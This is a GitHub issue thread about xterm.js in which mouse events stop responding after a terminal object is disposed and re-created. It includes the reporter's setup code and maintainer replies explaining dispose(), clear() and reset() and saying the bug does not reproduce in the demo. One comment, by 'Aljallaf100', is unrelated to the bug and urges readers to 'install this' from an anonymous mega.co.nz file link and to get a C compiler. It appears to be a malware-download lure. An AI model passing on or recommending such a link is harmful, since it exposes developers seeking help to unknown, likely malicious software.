### ISSUE TITLE
re-create term obj ,no mouse event  repsoned. Is there some re-enter limitation existed in xterm.js

### ISSUE THREAD

**Issue by wellcomez** [xtermjs/xterm.js#5161]
## Details
- Browser and browser version:  5.5.0
- OS version:  linux
- xterm.js version:  5.5.0

### Steps to reproduce

1. clear and close term obj
 - xterm.js and add-on
~~~html
   <script src="https://cdn.jsdelivr.net/npm/@xterm/xterm@5.5.0/lib/xterm.min.js"></script>
    <link href="https://cdn.jsdelivr.net/npm/@xterm/xterm@5.5.0/css/xterm.min.css" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/axios@1.6.7/dist/axios.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@xterm/addon-webgl@0.18.0/lib/addon-webgl.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@xterm/addon-fit@0.10.0/lib/addon-fit.min.js"></script>
~~~
 - clean code
~~~js
//clean object
        this.term.clear();
        this.term.dispose();
        this.term.reset()
//remove node
        let terminalContainer = document.getElementById('terminal');
        let parent = terminalContainer.parentElement;
        terminalContainer.remove();
        terminalContainer = document.createElement('div');
        terminalContainer.id = "terminal";
~~~ 
2.  Then create obj again
~~~js
    let term = new Terminal({
        allowProposedApi: true,
        cursorStyle: 'bar',  
        allowTransparency: true,
        cursorBlink: false,
        cursorWidth: 4,
        rows: rows,
        cols: cols,
        vt200Mouse: true,
        x10Mouse: true,
        vt300Mouse: true,
        MouseEvent: true,
        fontSize: fontSize,
        // fontFamily: 'SymbolsNerdFontMono "Fira Code", courier-new, courier, monospace, "Powerline Extra Symbols"',
        // fontFamily: 'Hack, "Fira Code", monospace',
        // fontFamily: 'HackNerdFontMono,monospace'
        fontFamily: 'SymbolsNerdFontMono,courier-new, courier, monospace'

        // minimumContrastRatio: 1,
    });
~~~

3. term key event still ok but mouse event not
4. About mouse support 

After I read and trace xterm.js, it will be enable after v100/drag protocol is  registered . 
First time create term object , register  will be called but second time not.
So I wonder whether there are global variables existed which prevent call re-enter

**Comment by Aljallaf100** [comment]
install this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
If you don't have the c compliator, install it.(gcc or clang)

**Comment by jerch** [comment]
> So I wonder whether there are global variables existed which prevent call re-enter

I dont think so, if there is, than it is prolly a dangling listener, that should been disposed.

Its not clear, what you do on initial startup, because none of the mouse tracking protocols are active on startup by default. There has to be some payload triggering a mouse tracking sequence.

**Comment by Tyriar** [comment]
> ```
>         //clean object
>         this.term.clear();
>         this.term.dispose();
>         this.term.reset()
> ```

`term.dispose()` is all you need here, dispose is for when you want to dispose the object and all its components and never use it again. `clear` clears the buffer (keeps modes, etc.), `reset` resets it to a clean slate (similar to calling `dispose` and `new Terminal`).

**Comment by wellcomez** [comment]
> > ```
> >         //clean object
> >         this.term.clear();
> >         this.term.dispose();
> >         this.term.reset()
> > ```
> 
> `term.dispose()` is all you need here, dispose is for when you want to dispose the object and all its components and never use it again. `clear` clears the buffer (keeps modes, etc.), `reset` resets it to a clean slate (similar to calling `dispose` and `new Terminal`).

It looks , necessary function is called, is there any other  step should be done ?

**Comment by Tyriar** [comment]
Cannot reproduce in demo when I dispose and recreate using the buttons in the test window. Let me know if you can reproduce in the demo and/or if I need tweaks to repro there.
